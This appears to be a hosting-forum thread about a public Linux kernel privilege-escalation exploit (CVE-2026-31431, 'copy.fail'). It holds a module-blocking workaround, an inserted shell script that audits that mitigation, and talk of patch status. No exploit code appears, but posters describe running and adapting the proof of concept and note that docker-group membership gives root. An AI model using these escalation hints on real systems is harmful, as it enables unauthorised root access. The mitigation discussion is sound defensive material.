Public exploit on most Linux distros - patching recommended
BackboneDirect
Member, Host Rep
Hi LET,
We wanted to make you aware of https://copy.fail - it's quite easy to get privileged access via such an exploit.
Remedy is disabling the algif module like below; the site explains it more clearly.
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

Comments
https://security-tracker.debian.org/tracker/CVE-2026-31431
If it weren't as solid as a rock it would be flexing :D
Had uploaded the same article but you had beaten me to it!
Anyways, it feels like a really scary bug to have for 7 years in the Linux kernel. This feels like a bug which a nation state might as well pay some crazy high millions for. Just absolutely wild.
There is software that has had supply chain attacks, so if you update to the latest version you get compromised, and software where previous bugs can lead to RCE (Opencode had that issue for example for some time), and now this issue too, which converts any RCE into a straight-up root privilege issue, which is a crazy escalation.
This bug still works on fresh Ubuntu/Debian but is fixed on Arch and Cachy and others, let's hope that this bug is solved ASAP by default.
I am a bit confused as to why Ubuntu set this bug as medium in their bug tracker when it should be high by their own standards/rules. Doesn't inspire confidence in Ubuntu that much, but I personally already use Debian, so YMMV.
There's not even a current patch for Ubuntu/Debian?? What am I supposed to do??
Most recent Debian version still vulnerable:
Ubuntu also mostly not patched (except 26.04 apparently):
https://ubuntu.com/security/CVE-2026-31431
The temporary workaround was provided in the original post:
This will disable AEAD support in AF_ALG entirely, preventing the possibility of exploitation.
I think doing this or something similar: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
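Since the thread keeps coming back to the modprobe.d one-liner, here is an added audit/apply script (not from the original post and not from the copy.fail write-up) that checks whether that rule is actually in effect on a box. The function names, the status words and the default paths (/etc/modprobe.d, /proc/modules, modules.builtin) are my choices; override them through the environment to run the checks against other files. Two caveats the one-liner alone does not cover are built in: an "install" rule only stops future loads, so an already-loaded algif_aead still needs rmmod or a reboot, and if the module is compiled into the kernel (listed in modules.builtin) no modprobe.d rule can help and only a kernel update does.

```shell
#!/bin/sh
# Added example, not from the original post or the copy.fail write-up:
# audit and apply the algif_aead autoload block suggested in this thread.
# Paths below are the usual locations; override them through the
# environment to run the checks against constructed files.

MODULE="${MODULE:-algif_aead}"
CONF_DIR="${CONF_DIR:-/etc/modprobe.d}"
MODULES_FILE="${MODULES_FILE:-/proc/modules}"
BUILTIN_FILE="${BUILTIN_FILE:-/lib/modules/$(uname -r)/modules.builtin}"

# 0 if some *.conf in $1 carries "install $2 /bin/false" (or /bin/true).
# A plain "blacklist" line is deliberately not accepted: it only stops
# alias-based autoloading, and the kernel requests this module by name.
conf_blocks_module() {
    [ -d "$1" ] || return 1
    grep -Eqs "^[[:space:]]*install[[:space:]]+$2[[:space:]]+/bin/(false|true)([[:space:]]|$)" "$1"/*.conf
}

# 0 if $2 appears as a loaded module in a /proc/modules-style listing $1.
module_loaded() {
    [ -r "$1" ] || return 1
    awk -v m="$2" '$1 == m { found = 1 } END { exit found ? 0 : 1 }' "$1"
}

# 0 if $2 is compiled into the kernel (listed in modules.builtin $1);
# then no modprobe.d rule can stop it and only a kernel update helps.
module_builtin() {
    [ -r "$1" ] || return 1
    grep -q "/$2\.ko\$" "$1"
}

# Prints one word and returns 0 only when the workaround is effective:
#   builtin  -> rule cannot help (exit 2)
#   loaded   -> module already in memory; the rule blocks future loads
#               only, so rmmod (or a reboot) is still required (exit 1)
#   blocked  -> install rule present and module not loaded (exit 0)
#   loadable -> nothing in place (exit 1)
audit_status() {
    conf_dir="$1"; modules_file="$2"; builtin_file="$3"; mod="$4"
    if module_builtin "$builtin_file" "$mod"; then
        echo builtin; return 2
    elif module_loaded "$modules_file" "$mod"; then
        echo loaded; return 1
    elif conf_blocks_module "$conf_dir" "$mod"; then
        echo blocked; return 0
    fi
    echo loadable; return 1
}

# Writes the rule from the thread into $1/disable-algif.conf and, on a
# live system, tries to unload an already-loaded copy so it takes effect now.
apply_workaround() {
    mkdir -p "$1"
    printf 'install %s /bin/false\n' "$2" > "$1/disable-algif.conf"
    if [ "$1" = "/etc/modprobe.d" ] && module_loaded /proc/modules "$2"; then
        rmmod "$2" || echo "rmmod failed (module in use?); reboot to finish" >&2
    fi
}

# Usage: sh audit_algif.sh audit    (as root: sh audit_algif.sh apply)
case "${1:-}" in
    audit) audit_status "$CONF_DIR" "$MODULES_FILE" "$BUILTIN_FILE" "$MODULE" ;;
    apply) apply_workaround "$CONF_DIR" "$MODULE"
           audit_status "$CONF_DIR" "$MODULES_FILE" "$BUILTIN_FILE" "$MODULE" ;;
esac
```

Run "audit" first: "loaded" means the conf file is not enough by itself, "builtin" means the modprobe.d route is closed on that kernel. The rmmod step fails while an AF_ALG AEAD socket still holds the module, which is why the script falls back to telling you to reboot rather than silently reporting success.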
This is why we can't have nice things
I'm still running Ubuntu 20.04 LTS with 5.0 kernel. What does this mean for me?
Fortunately it's only an LPE so an attacker would have to already have access to the server to be able to exploit it. It's a big problem for shared environments, but for private servers it's not that big a deal.
Kernel upgrade if it is fixed in a newer kernel.
good thing tux showed up!
More is coming soon as well:
https://xint.io/blog/copy-fail-linux-distributions
On Slackware 15.0 kernel 5.15.193 I'm getting this error:
su is located in a different directory.
Seems it expects su to be in /usr/bin which going by the error messages it obviously isn't. Probably the result of this stupid directory merge nonsense a lot of mainstream distributions applied recently.
Well, I did manage to edit it with the correct path, and now I'm getting this:
No idea, sorry. Maybe Slackware is just too cool to be owned by such a silly little exploit? Well, maybe it expects read permission for world and Slackware doesn't grant that by default, but at that point I am plainly guessing.
I tried it on non-sudo users on some Rocky Linux (4.X kernel) and it didn't work. But I updated and rebooted anyways.
Is there a comprehensive list yet of which distros are affected or not?
IPv6 only servers are immune! Get yours today!
Oh, not so fast...
Pretty scary. Debian still seems to be vulnerable on all stable versions: https://security-tracker.debian.org/tracker/CVE-2026-31431
Thank you for sharing!
Too scary, I cancelled my VPS.
Regards
Just turn off the internet on your VPS.
"The same exploit binary works unmodified on every Linux distribution."
Some have been patched, probably simplest to just check with your distro. At a minimum Debian and its descendants seem unpatched as yet.
Just to clarify, yes, the attacker would need to have access to a server to use the exploit, by "access" it's basically any host that can run tenant's code. So not just ssh logins, but also any client's docker/kubernetes containers, CI runners, and serverless functions. So, any host that can run someone's code.
Definitely scary that this affected almost every Linux distro released between 2017 and March 2026.
The other scary thing: it may be impossible to ever know if a system has been exploited. Because the exploit changes the page cache in RAM without touching any files on the disk, it would be nearly impossible to know, since the activity in RAM disappears upon reboot. And the only way to know if an attacker installed a persistent backdoor would be lots of digging through system files and network logs for anything unusual (finding a needle in a haystack).
So I would think all hosting providers and PaaS providers should patch and reboot immediately, then reinstall their OSes as soon as possible.
It's just a PoC. There are multiple ways to exploit it even if the Python PoC doesn't work.
I was joking, dear little girl avatar friend.
Once an attacker has user level access they can escalate their privileges in various manners. What makes this LPE special is it's universal and easy to trigger because of the size of the payload, but LPEs in general aren't particularly valuable to exploit brokers because privilege escalation is usually easy due to user misconfigurations.
For example, if you run docker containers and your compromised user is a member of the Docker group then that's an instant LPE because the attacker can use a docker container to perform privileged activities on the host that will give them sustained root access.
Anyone running shared environments should be gravely concerned by this, but anyone running a private server should already be gravely concerned when an unauthorized entity gains unprivileged access to their environment, regardless of whether there's a fancy LPE floating around or not.
Not so smart to show how to do the exploit, many wannabe hackers will use it now.
Apparently, they do
I am seeing almost 2x scanning sources of what's usually seen at this time of day